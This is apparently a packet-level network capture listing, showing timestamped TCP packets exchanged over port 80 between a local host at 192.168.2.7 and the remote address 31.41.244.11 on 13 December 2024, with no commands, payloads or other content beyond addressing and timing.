Dec 13, 2024 18:53:53.549936056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.550844908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.550894022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.550980091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.551028967 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.551812887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.551862955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.551912069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.551963091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.552813053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.552936077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.552937984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.552983046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.553741932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.553869963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.553920984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.554759979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.554862022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.554909945 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.555782080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.555830956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.555929899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.556773901 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.556823969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.556952953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.557009935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.557858944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.557909966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.557921886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.557967901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.558831930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.558880091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.558897018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.559926987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.559978008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.560022116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.560822010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.560869932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.560910940 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.560957909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.561939955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.561990976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.562014103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.562062025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.562859058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.562908888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.562966108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.563015938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.563885927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.563991070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.564048052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.564901114 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.564954996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.564996004 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.565045118 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.565869093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.565932035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.565944910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.565994978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.566987038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.567043066 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.567379951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.567433119 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.567944050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.568002939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.568026066 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.568073034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.568911076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.568974972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.569015026 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.569066048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.570039988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.570092916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.570139885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.570192099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.571085930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.571140051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.571147919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.571177959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.572007895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.572068930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.711354971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.711370945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.711548090 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.711549044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.711699963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.711718082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.711812973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.712610006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.712662935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.712698936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.712744951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.713362932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.713465929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.713514090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.714359999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.714405060 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.714478016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.714523077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.715384960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.715430975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.715471029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.715514898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.716370106 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.716420889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.716495991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.717392921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.717480898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.717498064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.718405008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.718441963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.718460083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.718513012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.718559027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.719430923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.719485044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.719526052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.719605923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.720448971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.720567942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.720613956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.721462965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.721512079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.721592903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.721637964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.722506046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.722558022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.722558975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.722600937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.723504066 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.723555088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.723572016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.724564075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.724630117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.724632978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.724776030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.725542068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.725594997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.725629091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.725681067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.726520061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.726574898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.726622105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.726667881 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.727531910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.727629900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.727682114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.728549957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.728610039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.728650093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.728698969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.729566097 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.729700089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.729748964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.730613947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.730716944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.730741024 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.730788946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.731601954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.731650114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.731794119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.731837988 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.732651949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.732702971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.732741117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.732784033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.733612061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.733726025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.733767986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.734636068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.734678984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.734739065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.734782934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.735645056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.735692024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.735769033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.735816002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.736660957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.736706018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.736764908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.737693071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.737735033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.737792015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.737838984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.738703966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.738749027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.738766909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.738809109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.739718914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.739763975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.739921093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.739963055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.740715981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.740761042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.740820885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.740864992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.741750956 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.741795063 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.741872072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.741918087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.742799044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.742855072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.742873907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.742914915 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.743771076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.743814945 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.743879080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.743920088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.744796038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.744844913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.744877100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.744916916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.745820999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.745939016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.745984077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.746846914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.746898890 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.746932030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.746978045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.747843981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.747900963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.747941017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.747983932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.748846054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.748965979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.749017954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.749861002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.749907017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.749948025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.749995947 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.750929117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.751019955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.751033068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.751072884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.751914978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.751960993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.752083063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.752124071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.752973080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.753006935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.753021955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.753052950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.753891945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.753937006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.753969908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.754926920 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.754975080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.755089045 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.755131006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.755944014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.756047010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.756083012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.756100893 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.756959915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.757004976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.757097960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.757150888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.757992029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.758100033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.758143902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.759035110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.759087086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.759172916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.759215117 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.760065079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.760109901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.760148048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.760195017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.761015892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.761060953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.761092901 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.761135101 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.762130976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.762274981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.762321949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.763072014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.763123989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.763211966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.763366938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.764141083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.764166117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.764185905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.764208078 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.903405905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.903465033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.903500080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.903544903 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.904159069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.904213905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.904391050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.904441118 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.905220985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.905236959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.905281067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.905281067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.906122923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.906141043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.906171083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.906208992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.906929970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.906980991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.907275915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.907335997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.908067942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.908121109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.908240080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.908292055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.909060955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.909113884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.909260988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.909313917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.910070896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.910228014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.910274982 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.911138058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.911154032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.911186934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.911218882 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.912034035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.912149906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.912200928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.913203955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.913254023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.913367987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.913414001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.914232016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.914388895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.914439917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.915046930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.915096045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.915344000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.915389061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.916122913 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.916168928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.916347980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.916394949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.917283058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.917299032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.917356014 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.918117046 CET	80	49917	31.41.244.11	192.168.2.7
